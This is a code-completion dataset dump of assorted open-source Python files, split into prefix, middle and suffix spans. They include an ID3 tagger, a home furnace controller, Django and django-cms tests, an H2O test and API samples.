repo_name
stringlengths
5
100
path
stringlengths
4
231
language
stringclasses
1 value
license
stringclasses
15 values
size
int64
6
947k
score
float64
0
0.34
prefix
stringlengths
0
8.16k
middle
stringlengths
3
512
suffix
stringlengths
0
8.17k
unnikrishnankgs/va
venv/lib/python3.5/site-packages/nbformat/_version.py
Python
bsd-2-clause
113
0
# Make sure t
o update package.json, too! version_info = (4, 3, 0) __version__ = '.'.join
(map(str, version_info))
timtadh/PyOhio2011
t_predictive.py
Python
bsd-3-clause
562
0.007117
#!/usr/bin/env python # -*- coding: utf-8 -*- #Author: Tim Henderson #Email: tim.tadh@hackthology.com #For licensing see the LICENSE file in the top level directory. from predictive import parse def t_expr_compound(): assert (4*3/2) == parse('4*3/2') assert (4/2*3) == parse('4/2*3') assert ((3+9)*4/8) == parse('(3+9)*4/8') asser
t (((9-3)*(5-3))/2 + 2) == parse('((9-3)*(5-3))/2 + 2') assert (5 * 4 / 2 - 10 + 5 - 2 + 3) == parse('5 * 4 / 2 - 10 + 5 - 2 + 3') assert (5 /
4 * 2 + 10 - 5 * 2 / 3) == parse('5 / 4 * 2 + 10 - 5 * 2 / 3')
praneetmehta/FSMD
ID3update.py
Python
mit
3,922
0.031362
import urllib2 import eyed3 import mechanize import os from bs4 import BeautifulSoup as bs import unicodedata as ud import sys import string reload(sys) sys.setdefaultencoding('utf-8') class Song: def __init__(self, keyword, filename, albumart, aaformat, dd='/home/praneet/Music/'): self.info = keyword.split('@') self.filename = os.path.join(dd, filename).encode('utf-8') self.keyword = urllib2.quote(('').join(self.info)) self.albumart = albumart self.aaformat = aaformat self.album = '' self.artist = string.capwords(self.info[1]) self.title = self.info[0] self.feat = ' ' self.genre = 'Unknown' self.dd = dd self.fetchID3() def fetchID3(self): browser = mechanize.Browser() browser.set_handle_robots(False) browser.addheaders = [('User-agent','Mozilla')] searchURL = "https://www.google.co.in/search?site=imghp&source=hp&biw=1414&bih=709&q="+urllib2.quote(self.title+' '+self.artist+' song') html = browser.open(searchURL) soup = bs(html, 'html.parser') souplist = soup.findAll(attrs={'class':'_o0d'}) for i in range(1,len(souplist)): if souplist[i].get_text().split(':')[0].lower() == 'album' or souplist[i].get_text().split(':')[0].lower() == 'movie': self.album = souplist[i].get_text().split(':')[1] print 'album ',souplist[i].get_text().split(':')[1] elif souplist[i].get_text().split(':')[0].lower() == 'artist' or souplist[i].get_text().split(':')[0].lower() == 'artists': self.artist = souplist[i].get_text().split(':')[1] print 'artist ',souplist[i].get_text().split(':')[1] elif souplist[i].get_text().split(':')[0].lower() == 'genre' or souplist[i].get_text().split(':')[0].lower() == 'genres': self.genre = souplist[i].get_text().split(':')[1] print 'genre ',souplist[i].get_text().split(':')[1] elif soup
list[i].get_text().split(':')[0].lower() == 'featured artist' or souplist[i].get_text().split(':')[0].lower() == 'featured artists': self.feat = souplist[i].get_text().split(':')[1] print 'featured artist ',souplist[i].get_text().split(':')[1] else: pass self.fetchalbum() def fetchalbum(self): browser = mechanize.Browser() browser.set_handle_robots(False) browser.addheaders = [('User-agent','Mozilla
')] searchURL = "https://www.google.co.in/search?site=imghp&source=hp&biw=1414&bih=709&q="+urllib2.quote(self.title+' '+self.artist+' album name') html = browser.open(searchURL) soup = bs(html, 'html.parser') for i in soup.findAll(attrs={'class':'_B5d'}): if self.album == '': self.album = i.get_text() print self.album break if self.album == '': if not self.info[2].isspace() and self.info[2] != '': self.album = string.capwords(self.info[2]) else: self.album = self.title + '- Single' print 'album', self.album def updateID3(self): audiofile = eyed3.load(self.filename) try: audiofile.tag.artist = unicode(self.artist, "utf-8") except: audiofile.tag.artist = self.artist try: audiofile.tag.album = unicode(self.album, "utf-8") except: audiofile.tag.album = self.album title = '' if self.feat == ' ': title = self.title else: title = self.title+' ft. '+self.feat try: audiofile.tag.title = unicode(title, "utf-8") except: audiofile.tag.title = title try: audiofile.tag.genre = unicode(self.genre, "utf-8") except: audiofile.tag.genre = self.genre audiofile.tag.images.set(3, open(self.albumart,'rb').read(), 'image/'+self.aaformat) audiofile.tag.save() if not os.path.isfile(self.dd+title+'.mp3'): os.rename(self.filename, self.dd+title.rstrip()+'.mp3') else: newTitle = raw_input('Similar file already exits, enter new file name: ') os.rename(self.filename, self.dd+newTitle.rstrip()+'.mp3') print 'update complete' os.remove(self.albumart) # newsong = Song('Rockabye','Rockabye.mp3', 'rockabye','rockabye album art.jpeg','jpeg') # newsong.updateID3()
hzlf/openbroadcast
website/cms/tests/apphooks.py
Python
gpl-3.0
9,529
0.006716
# -*- coding: utf-8 -*- from __future__ import with_statement from cms.api import create_page, create_title from cms.apphook_pool import apphook_pool from cms.appresolver import (applications_page_check, clear_app_resolvers, get_app_patterns) from cms.test_utils.testcases import CMSTestCase from cms.test_utils.util.context_managers import SettingsOverride from django.contrib.auth.models import User from django.core.urlresolvers import clear_url_caches, reverse import sys APP_NAME = 'SampleApp' APP_MODULE = "cms.test_utils.project.sampleapp.cms_app" class ApphooksTestCase(CMSTestCase): def setUp(self): clear_app_resolvers() clear_url_caches() if APP_MODULE in sys.modules: del sys.modules[APP_MODULE] def tearDown(self): clear_app_resolvers() clear_url_caches() if APP_MODULE in sys.modules: del sys.modules[APP_MODULE] def test_explicit_apphooks(self): """ Test explicit apphook loading with the CMS_APPHOOKS setting. """ apphooks = ( '%s.%s' % (APP_MODULE, APP_NAME), ) with SettingsOverride(CMS_APPHOOKS=apphooks): apphook_pool.clear() hooks = apphook_pool.get_apphooks() app_names = [hook[0] for hook in hooks] self.assertEqual(len(hooks), 1) self.assertEqual(app_names, [APP_NAME]) apphook_pool.clear() def test_implicit_apphooks(self): """ Test implicit apphook loading with INSTALLED_APPS + cms_app.py """ apps = ['cms.test_utils.project.sampleapp'] with SettingsOverride(INSTALLED_APPS=apps, ROOT_URLCONF='cms.test_utils.project.urls_for_apphook_tests'): apphook_pool.clear() hooks = apphook_pool.get_apphooks() app_names = [hook[0] for hook in hooks] self.assertEqual(len(hooks), 1) self.assertEqual(app_names, [APP_NAME]) apphook_pool.clear() def test_apphook_on_root(self): with SettingsOverride(ROOT_URLCONF='cms.test_utils.project.urls_for_apphook_tests'): apphook_pool.clear() superuser = User.objects.create_superuser('admin', 'admin@admin.com', 'admin') page = create_page("apphooked-page", "nav_playground.html", "en", created_by=superuser, published=True, apphook="SampleApp") blank_page = create_page("not-apphooked-page", "nav_playground.html", "en", created_by=superuser, published=True, apphook="", slug='blankapp') english_title = page.title_set.all()[0] self.assertEquals(english_title.language, 'en') create_title("de", "aphooked-page-de", page, apphook="SampleApp") self.assertTrue(page.publish()) self.assertTrue(blank_page.publish()) response = self.client.get(self.get_pages_root()) self.assertTemplateUsed(response, 'sampleapp/home.html') response = self.client.get('/en/blankapp/') self.assertTemplateUsed(response, 'nav_playground.html') apphook_pool.clear() def test_apphook_on_root_reverse(self): with SettingsOverride(ROOT_URLCONF='cms.test_utils.project.urls_for_apphook_tests'): apphook_pool.clear() superuser = User.objects.create_superuser('admin', 'admin@admin.com', 'admin') page = create_page("apphooked-page", "nav_playground.html", "en", created_by=superuser, published=True, apphook="SampleApp") create_title("de", "aphooked-page-de", page, apphook="SampleApp") self.assertTrue(page.publish()) self.assertFalse(reverse('sample-settings').startswith('//')) apphook_pool.clear() def test_get_page_for_apphook(self): with SettingsOverride(ROOT_URLCONF='cms.test_utils.project.second_urls_for_apphook_tests'): apphook_pool.clear() superuser = User.objects.create_superuser('admin', 'admin@admin.com', 'admin') page = create_page("home", "nav_playground.html", "en", created_by=superuser, published=True) create_title('de', page.get_title(), page) child_page = create_page("child_page", "nav_playground.html", "en", created_by=superuser, published=True, parent=page) create_title('de', child_page.get_title(), child_page) child_child_page = create_page("child_child_page", "nav_playground.html", "en", created_by=superuser, published=True, parent=child_page, apphook='SampleApp') create_title("de", child_child_page.get_title(), child_child_page, apphook='SampleApp') child_child_page.publish() # publisher_public is set to draft on publish, issue with onetoone reverse child_child_page = self.reload(child_child_page) en_title = child_child_page.publisher_public.get_title_obj('en') path = reverse('en:sample-settings') request = self.get_request(path) request.LANGUAGE_CODE = 'en' attached_to_page = applications_page_check(request, path=path[1:]) # strip leading slash self.assertEquals(attached_to_page.pk, en_title.page.pk) response = self.client.get(path) self.assertEquals(response.status_code, 200) self.assertTemplateUsed(response, 'sampleapp/home.html') self.assertContains(response, en_title.title) de_title = child_child_page.publisher_public.get_title_obj('de') path = reverse('de:sample-settings') request = self.get_request(path) request.LANGUAGE_CODE = 'de' attached_to_page = applications_page_check(request, path=path[4:]) # strip leading slash and language prefix self.assertEquals(attached_to_page.pk, de_title.page.pk) response = self.client.get(path) self.assertEquals(response.status_code, 200) self.assertTemplateUsed(response, 'sampleapp/home.html') self.assertContains(response, de_title.title) apphook_pool.clear() def test_include_urlconf(self): with SettingsOverride(ROOT_URLCONF='cms.test_utils.project.second_urls_for_apphook_tests'): apphook_pool.clear() superuser = User.objects.create_superuser('admin', 'admin@admin.com', 'admin'
) page = create_page("home", "nav_playground.html", "en", created_by=superus
er, published=True) create_title('de', page.get_title(), page) child_page = create_page("child_page", "nav_playground.html", "en", created_by=superuser, published=True, parent=page) create_title('de', child_page.get_title(), child_page) child_child_page = create_page("child_child_page", "nav_playground.html", "en", created_by=superuser, published=True, parent=child_page, apphook='SampleApp') create_title("de", child_child_page.get_title(), child_child_page, apphook='SampleApp') child_child_page.publish() path = reverse('extra_second') response = self.client.get(path) self.assertEquals(response.status_code, 200) self.assertTemplateUsed(response, 'sampleapp/extra.html') self.assertContains(response, "test included urlconf") path = reverse('extra_first') response = self.client.get(path) self.assertEquals(response.status_code, 200) self.assertTemplateUsed(response, 'sampleapp/extra.html') self.assertContains(response, "test urlconf") path = reverse('de:extra_first') response = self.client.get(p
ilendl2/chrisdev-cookiecutter
{{cookiecutter.repo_name}}/{{cookiecutter.project_name}}/photos/urls.py
Python
bsd-3-clause
387
0.002584
from django.con
f.urls import patterns, url, include from .views import GalleryListView, GalleryDetailView urlpatterns = patterns("", url( regex=r"^gallery_list/$", view=GalleryListView.as_view(), name="gallery_list", ), url( regex=r"^gallery/(?P<pk>\d+)/$", view=GalleryDetail
View.as_view(), name="gallery_detail", ), )
Sorsly/subtle
google-cloud-sdk/lib/googlecloudsdk/command_lib/compute/sole_tenancy/sole_tenancy_hosts/flags.py
Python
mit
967
0
# Copyright 2016 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the Li
cense at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Flag related helpers for sole tenancy related commands.""" from googlecloudsdk.command_lib.compute import flags as c
ompute_flags from googlecloudsdk.command_lib.compute import scope as compute_scope SOLE_TENANCY_HOST_TYPE_RESOLVER = compute_flags.ResourceResolver.FromMap( 'sole tenancy host type', { compute_scope.ScopeEnum.ZONE: 'compute.hostTypes'})
rowhit/h2o-2
py/testdir_single_jvm/test_NN2_twovalues.py
Python
apache-2.0
5,312
0.012236
import unittest, time, sys, re sys.path.extend(['.','..','../..','py']) import h2o, h2o_nn, h2o_cmd, h2o_browse as h2b, h2o_import as h2i, h2o_gbm def write_syn_dataset(csvPathname, rowCount, rowDataTrue, rowDataFalse, outputTrue, outputFalse): dsf = open(csvPathname, "w+") for i in range(int(rowCount/2)): dsf.write(rowDataTrue + ',' + outputTrue + "\n") for i in range(int(rowCount/2)): dsf.write(rowDataFalse + ',' + outputFalse + "\n") dsf.close() class test_NN_twovalues(unittest.TestCase): def tearDown(self): h2o.check_sandbox_for_errors() @classmethod def setUpClass(cls): # fails with 3 global SEED SEED = h2o.setup_random_seed() h2o.init(1, java_heap_GB=4) # h2b.browseTheCloud() @classmethod def tearDownClass(cls): h2o.tear_down_cloud(h2o.nodes) def test_DeepLearning_twovalues(self): SYNDATASETS_DIR = h2o.make_syn_dir() csvFilename = "syn_twovalues.csv" csvPathname = SYNDATASETS_DIR + '/' + csvFilename rowDataTrue = "1, 0, 65, 1, 2, 1, 1, 4, 1, 4, 1, 4" rowDataFalse = "0, 1, 0, -1, -2, -1, -1, -4, -1, -4, -1, -4" twoValueList = [ ('A','B',0, 14), ('A','B',1, 14), (0,1,0, 12), (0,1,1, 12), (0,1,'NaN', 12), (1,0,'NaN', 12), (-1,1,0, 12), (-1,1,1, 12), (-1e1,1e1,1e1, 12), (-1e1,1e1,-1e1, 12), ] trial = 0 for (outputTrue, outputFalse, case, coeffNum) in twoValueList: write_syn_dataset(csvPathname, 20, rowDataTrue, rowDataFalse, str(outputTrue), str(outputFalse)) start = time.time() hex_key = csvFilename + "_" + str(trial) model_key = 'trial_' + str(trial) + '.hex' validation_key = hex_key parseResult = h2i.import_parse(path=csvPathname, schema='put', hex_key=hex_key) print "using outputTrue: %s outputFalse: %s" % (outputTrue, outputFalse) inspect = h2o_cmd.runInspect(None, parseResult['destination_key']) print "\n" + csvPathname, \ " numRows:", "{:,}".format(inspect['numRows']), \ " numCols:", "{:,}".format(inspect['numCols']) response = inspect['numCols'] response = 'C' + str(response) kwargs = { 'ignored_cols' : None, 'response' : response, 'classification' : 1, 'activation' : 'Tanh', #'input_dropout_ratio' : 0.2, 'hidden' : '113,71,54', 'rate' : 0.01, 'rate_annealing' : 1e-6, 'momentum_start' : 0, 'momentum_stable' : 0, 'l1' : 0.0, 'l2' : 1e-6, 'seed' : 80023842348, 'loss' : 'CrossEntropy', #'max_w2' : 15, 'initial_weight_distribution' : 'UniformAdaptive', #'initial_weight_scale' : 0.01, 'epochs' : 100, 'destination_key' : model_key, 'validation' : hex_key, } timeoutSecs = 60 start = time.time() h2o_cmd.runDeepLearning(parseResult=parseResult, timeoutSecs=timeoutSecs, **kwargs) print "trial #", trial, "Deep Learning end on ", csvFilename, ' took', time.time() - start, 'seconds' #### Now score using the model, and check the validation error expectedErr = 0.00 relTol = 0.01 predict_key = 'Predict.hex' kwargs = { 'data_key': v
alidation_key, 'destination_key': predict_key, 'model_key': model_key } predictResult = h2o_cmd.runPredict(timeoutSecs=timeoutSecs, **kwargs) h2o_cmd.runInspect(key=predict_key, verbose=True) kwargs = { } predictCMResult = h2o.nodes[0].predict_co
nfusion_matrix( actual=validation_key, vactual=response, predict=predict_key, vpredict='predict', timeoutSecs=timeoutSecs, **kwargs) cm = predictCMResult['cm'] print h2o_gbm.pp_cm(cm) actualErr = h2o_gbm.pp_cm_summary(cm)/100. print "actual classification error:" + format(actualErr) print "expected classification error:" + format(expectedErr) if actualErr != expectedErr and abs((expectedErr - actualErr)/expectedErr) > relTol: raise Exception("Scored classification error of %s is not within %s %% relative error of %s" % (actualErr, float(relTol)*100, expectedErr)) trial += 1 if __name__ == '__main__': h2o.unit_main()
040medien/furnaceathome
furnace_client.py
Python
gpl-2.0
15,051
0.011694
#! /usr/bin/env python import bluetoot
h import subprocess import re import time import string import pywapi import httplib import ast import socket import ConfigParser import io from da
tetime import datetime, date from time import mktime from urllib import urlencode from urllib2 import Request, urlopen, URLError, HTTPError from ssl import SSLError from socket import error as SocketError class Config: """Holds basic settings as well as current state""" def __init__(self): c = ConfigParser.RawConfigParser() c.read('.furnace.cfg') self.bluetooth_addr = c.get('relay', 'bluetooth_addr') self.bluetooth_port = c.getint('relay', 'bluetooth_port') self.relay_channels = c.getint('relay', 'channels') self.primary_furnace = c.getint('relay', 'primary_furnace') self.base_url = c.get('url', 'base_url') self.secret = c.get('url', 'secret') self.zip_code = c.get('house', 'zip_code') self.room = c.get('house', 'room') self.home_status = '' self.mode = '' self.last_time_home=0 self.indoor_temp_target=0 self.indoor_temp_target_dict={} self.default_temp_day=c.getint('default_temp', 'day') self.default_temp_night=c.getint('default_temp', 'night') self.default_temp_away=c.getint('default_temp', 'away') presence_devices=c.items('devices') presence_devices_wifi=[] for device in presence_devices: presence_devices_wifi.append(dict(owner=device[0], ip_address=device[1], timestamp=0)) self.presence_devices_wifi = presence_devices_wifi def write(self): c = ConfigParser.RawConfigParser() c.write('.furnace.cfg') def ping(ip_address): """Determines if a certain IP address is currently used on our network (to determine device presence).""" try: ping = subprocess.Popen(["nmap", "-sP", ip_address], stdout=subprocess.PIPE, stderr=subprocess.PIPE) out, error = ping.communicate() received=-1 if out: try: received=int(re.findall(r"(\d+) host up", out)[0]) except: received=0 else: print 'No response from nmap' except subprocess.CalledProcessError: print "Couldn't get a ping" return received def getTarget(config, indoor_temp): """Defines the target temperature and current operating mode (target temp, day default, night default).""" now = datetime.now() home_status = config.home_status indoor_temp_target_dict = config.indoor_temp_target_dict print "%s:%s" % (string.zfill(now.hour,2), string.zfill(now.minute,2)) utimestamp=mktime(datetime.now().utctimetuple()) default_temp_day = config.default_temp_day default_temp_night = config.default_temp_night default_temp_away = config.default_temp_away default_temp_mode = '' config.mode = '' try: default_temp = indoor_temp_target_dict['default_temperature'] default_temp_mode = indoor_temp_target_dict['default_temperature_mode'] target_timestamp = indoor_temp_target_dict['date'] + indoor_temp_target_dict['start_minutes'] * 60 target_end_timestamp = indoor_temp_target_dict['date'] + indoor_temp_target_dict['start_minutes'] * 60 + indoor_temp_target_dict['held_minutes'] * 60 if target_end_timestamp > utimestamp: time_to_target = int(round((target_timestamp - utimestamp) / 60)) time_to_end = int(round((target_end_timestamp - utimestamp) / 60)) if target_timestamp > utimestamp: print "we've got a target coming up in %s minutes" % time_to_target # we need about 2 minutes per degree Celsius if time_to_target <= 0 or time_to_target * 2 <= indoor_temp_target_dict['temperature'] - indoor_temp: config.indoor_temp_target = indoor_temp_target_dict['temperature'] config.mode = 'timer' print "setting target to %s degrees Celsius for %s more minutes" % (indoor_temp_target_dict['temperature'], time_to_end) except KeyError: print "no target set" if config.mode != 'timer': # TODO: make the time periods configurable in the interface if datetime.today().isoweekday() <= 5: # Week day if home_status=='away': config.mode='away' if config.mode == default_temp_mode and default_temp != default_temp_away: config.indoor_temp_target = default_temp print "When mode is %s it should be %s degrees Celsius" % (config.mode, default_temp) config.default_temp_away = default_temp else: config.indoor_temp_target=default_temp_away elif (0 <= now.hour < 7) and home_status=='home': config.mode='night' if config.mode == default_temp_mode and default_temp != default_temp_night: config.indoor_temp_target = default_temp print "When mode is %s it should be %s degrees Celsius" % (config.mode, default_temp) config.default_temp_night = default_temp else: config.indoor_temp_target = default_temp_night elif 7 <= now.hour and home_status=='home': config.mode='day' if config.mode == default_temp_mode and default_temp != default_temp_day: config.indoor_temp_target = default_temp print "When mode is %s it should be %s degrees Celsius" % (config.mode, default_temp) config.default_temp_day = default_temp else: config.indoor_temp_target = default_temp_day else: # Weekend if home_status=='away': config.mode='away' if config.mode == default_temp_mode and default_temp != default_temp_away: config.indoor_temp_target = default_temp print "When mode is %s it should be %s degrees Celsius" % (config.mode, default_temp) config.default_temp_away = default_temp else: config.indoor_temp_target=default_temp_away elif (0 <= now.hour < 8) and home_status=='home': config.mode='night' if config.mode == default_temp_mode and default_temp != default_temp_night: config.indoor_temp_target = default_temp print "When mode is %s it should be %s degrees Celsius" % (config.mode, default_temp) config.default_temp_night = default_temp else: config.indoor_temp_target = default_temp_night elif 8 <= now.hour and home_status=='home': config.mode='day' if config.mode == default_temp_mode and default_temp != default_temp_day: config.indoor_temp_target = default_temp print "When mode is %s it should be %s degrees Celsius" % (config.mode, default_temp) config.default_temp_day = default_temp else: config.indoor_temp_target = default_temp_day config.write return config def checkPresence(config): """Pings all configured devices to determine who's at home""" no_of_users_at_home=0 last_time_home=config.last_time_home now = mktime(datetime.now().utctimetuple()) for device in config.presence_devices_wifi: if device['timestamp'] >= now - 600: print "Assuming %s is still at home" % device['owner'] no_of_users_at_home+=1 if no_of_users_at_home == 0: for device in config.presence_devices_wifi: if ping(device['ip_address']) > 0: print "%s seems to be at home" % device['owner'] device['timestamp']=now last_time_home=now no_of_users_at_home+=1 if no_of_users_at_home > 0: home_status='home' else: home_status='away' else: home_status='home' return last_time_ho
anhstudios/swganh
data/scripts/templates/object/mobile/shared_dressed_binayre_ruffian_trandoshan_male_01.py
Python
mit
472
0.04661
#### NOTICE: THIS FILE IS AUTOGENERATED #### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY #### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES from swgpy.object import * def cr
eate(kernel): result = Creature() result.template = "object/mobile/shared_dressed_binayre_ruffian_trandoshan_male_01.iff" result.attribute_template_id = 9 result.stfName("npc_name","trandoshan_base_male") #### BEGIN MODIFICATIONS #### ####
END MODIFICATIONS #### return result
rebase-helper/rebase-helper
rebasehelper/helpers/input_helper.py
Python
gpl-2.0
3,222
0.000622
# -*- coding: utf-8 -*- # # This tool helps you rebase your package to the latest version # Copyright (C) 2013-2019 Red Hat, Inc. # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License along # with this program; if not, write to the Free Software Foundation, Inc., # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. # # Authors: Petr Hráček <phracek@redhat.com> # Tomáš Hozza <thozza@redhat.com> # Nikola Forró <nforro@redhat.com> # František Nečas <fifinecas@seznam.cz> import logging from typing import cast from rebasehelper.logger import CustomLogger logger: CustomLogger = cast(CustomLogger, logging.getLogger(__name__)) class InputHelper: """Class for command line interaction with the user.""" @staticmethod def strtobool(message): """Converts a user message to a corresponding truth value. This method is a replacement for deprecated strtobool from distutils, its behaviour remains the same. Args: message (str): Message to evalu
ate. Returns: bool: True on 'y', 'yes', 't', 'true', 'on' and '1'. False on 'n', 'no', 'f', 'false', 'off' and '0'. Raises: ValueError: On any other value. """ message = message.lower() if message in ('y', 'yes', 't', 'true', 'on', '1'): return True elif message in ('n', 'no', 'f', 'false', 'off', '0'): return False raise ValueError('No conversion to truth value fo
r "{}"'.format(message)) @classmethod def get_message(cls, message, default_yes=True, any_input=False): """Prompts a user with yes/no message and gets the response. Args: message (str): Prompt string. default_yes (bool): If the default value should be YES. any_input (bool): Whether to return default value regardless of input. Returns: bool: True or False, based on user's input. """ if default_yes: choice = '[Y/n]' else: choice = '[y/N]' if any_input: msg = '{0} '.format(message) else: msg = '{0} {1}? '.format(message, choice) while True: user_input = input(msg).lower() if not user_input or any_input: return True if default_yes else False try: user_input = cls.strtobool(user_input) except ValueError: logger.error('You have to type y(es) or n(o).') continue if any_input: return True else: return bool(user_input)
ptphp/PtPy
pttornado/src/handler/user.py
Python
bsd-3-clause
712
0.018786
#!/usr/bin/env python #coding=utf8 import datetime import logging from handler import UserBaseHandler from lib.route import route from lib.util import vmobile @route(r'/user', name='user') #用户后台首页 class UserHandler(UserBaseHandler): def get(self): user =
self.get_current_user() try: self.session['user'] = user self.session.save() except: pass self.render('user/index.html')
@route(r'/user/profile', name='user_profile') #用户资料 class ProfileHandler(UserBaseHandler): def get(self): self.render('user/profile.html') def post(self): self.redirect('/user/profile')
googleapis/python-translate
samples/generated_samples/translate_v3beta1_generated_translation_service_get_glossary_sync.py
Python
apache-2.0
1,480
0.000676
# -*- coding: utf-8 -*- # Copyright 2022 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # Generated code. DO NOT EDIT! # # Snippet for GetGlossary # NOTE: This snippet has been automatically generated for illustrative purposes only. # I
t may require modifications to work in your environment. # To install the latest published package dependency, execute the following: # python3 -m pip install google-cloud-translate # [START translate_v3beta1_generated_TranslationService_GetGlossary_sync] from google.cloud import translate_v3beta1 def sample_get_glossary(): # Create a client client = translate_v3beta1.TranslationServiceClient() # Initialize request argument(s) request = translate_v3beta1.GetGlossaryRequest( name="name_value", ) # Make the request response = client.get_glossary(request=request) # Handle the response print(response) # [END translate_v3beta1_generated_TranslationService_GetGlossary_sync]
jmchilton/galaxy-central
galaxy/test/functional/test_3B_GetEncodeData.py
Python
mit
1,185
0.01097
from galaxy.test.base.twilltestcase import TwillTestCase #from twilltestcase import TwillTestCase class EncodeTests(TwillTestCase): def test_00_first(self): # will run first due to its name """3B_GetEncodeData: Clearing history""" self.clear_history() def test_10_Encode_Data(self): """3B_GetEncodeData: Getting encode data""" self.run_tool('encode_import_chromatin_and_chromosomes1', hg17=['cc.EarlyRepSeg.20051216.bed'] ) # hg17=[ "cc.EarlyRepSeg.20051216.bed", "cc.EarlyRepSeg.20051216.gencode_partitioned.bed", "cc.LateRepSeg.20051216.bed", "cc.LateRepSeg.
20051216.gencode_partitioned.bed", "cc.MidRepSeg.20051216.bed", "cc.MidRepSeg.20051216.gencode_partitioned.bed" ] ) self.wait() self.check_data('cc.EarlyRepSeg.20051216.bed', hid=1) # self.check_data('cc.EarlyRepSeg.20051216.gencode_partitioned.bed', hid=2) # self.check_data('cc.LateRepSeg.20051216.bed', hi
d=3) # self.check_data('cc.LateRepSeg.20051216.gencode_partitioned.bed', hid=4) # self.check_data('cc.MidRepSeg.20051216.bed', hid=5) # self.check_data('cc.MidRepSeg.20051216.gencode_partitioned.bed', hid=6)
t104801/webapp
security/urls.py
Python
gpl-3.0
1,479
0.004057
from django.conf.urls import url from django.c
ontrib.
auth.views import login, \ logout, \ logout_then_login, \ password_change, \ password_change_done, \ password_reset, \ password_reset_done, \ password_reset_confirm, \ password_reset_complete from . import views urlpatterns = [ url(r'^$', views.dashboard, name='dashboard'), # login / logout urls url(r'^login/$', view=login, name='login'), url(r'^logout/$', view=logout, name='logout'), url(r'^logout-then-login/$', view=logout_then_login, name='logout_then_login'), # change password urls url(r'^password-change/$', view=password_change, name='password_change'), url(r'^password-change/done/$', view=password_change_done, name='password_change_done'), # restore password urls url(r'^password-reset/$', view=password_reset, name='password_reset'), url(r'^password-reset/done/$', view=password_reset_done, name='password_reset_done'), url(r'^password-reset/confirm/(?P<uidb64>[-\w]+)/(?P<token>[-\w]+)/$', view=password_reset_confirm, name='password_reset_confirm'), url(r'^password-reset/complete/$', view=password_reset_complete, name='password_reset_complete'), ]
tmtowtdi/MontyLacuna
lib/lacuna/buildings/boring/fission.py
Python
mit
219
0.031963
from lacuna.building import MyBuilding class fission(MyBuilding):
path = 'fission' def __init__( self, client, body_id:int = 0, building_id:int = 0 ): super().__
init__( client, body_id, building_id )
fingeronthebutton/RIDE
utest/controller/test_tablecontrollers.py
Python
apache-2.0
2,586
0.004254
import unittest from nose.tools import assert_equals from robotide.robotapi import TestCaseFile, TestCaseFileSettingTable from robotide.controller.filecontrollers import TestCaseFileController from robotide.controller.tablecontrollers import ImportSettingsController VALID_NAME = 'Valid name' class TestCaseNameValidationTest(unittest.TestCase): def setUp(self): self.ctrl = TestCaseFileController(TestCaseFile()).tests def test_valid_name(self): self._validate_name(VALID_NAME, True) def test_empty_name(self): self._validate_name('', False) def test_name_with_only_whitespace(self): self._validate_name(' ', False) def test_duplicate_name(self): self.ctrl.new(VALID_NAME) self._validate_name(VALID_NAME, False) self._validate_name(VALID_NAME.upper(), False) self._validate_name(VALID_NAME.replace(' ', '_'), False) def test_duplicate_name_when_previous_name_known(self): ctrl = self.ctrl.new(VALID_NAME) self._validate_name(VALID_NAME, True, ctrl) self._validate_name(VALID_NAME.upper(), True, ctrl) self._validate_name(VALID_NAME.replace(' ', '_'), True, ct
rl) def _validate_name(self, name, expected_valid, named_ctrl=None): valid = not bool(self.ctrl.validate_name(name, named_ctrl).error_message) assert_equals(valid, expected_valid) class TestCaseCreationTest(unittest.TestCase): def setUp(self): self.ctrl = TestCaseFileController(TestCaseFile()).tests def test_wh
itespace_is_stripped(self): test = self.ctrl.new(' ' + VALID_NAME + '\t \n') assert_equals(test.name, VALID_NAME) class LibraryImportListOperationsTest(unittest.TestCase): def setUp(self): self._parent = lambda:0 self._parent.mark_dirty = lambda:0 self._parent.datafile_controller = self._parent self._parent.update_namespace = lambda:0 self._table = TestCaseFileSettingTable(lambda:0) self.ctrl = ImportSettingsController(self._parent, self._table) self._lib1 = self.ctrl.add_library('libbi1', '', '') self._lib2 = self.ctrl.add_library('libbi2', '', '') self.assertEqual([self._lib1.name, self._lib2.name], [l.name for l in self.ctrl]) def test_move_up(self): self.ctrl.move_up(1) self.assertEqual([self._lib2.name, self._lib1.name], [l.name for l in self.ctrl]) def test_move_down(self): self.ctrl.move_down(0) self.assertEqual([self._lib2.name, self._lib1.name], [l.name for l in self.ctrl])
HuaweiSwitch/ansible
lib/ansible/modules/web_infrastructure/ansible_tower/tower_job_launch.py
Python
gpl-3.0
4,901
0.000816
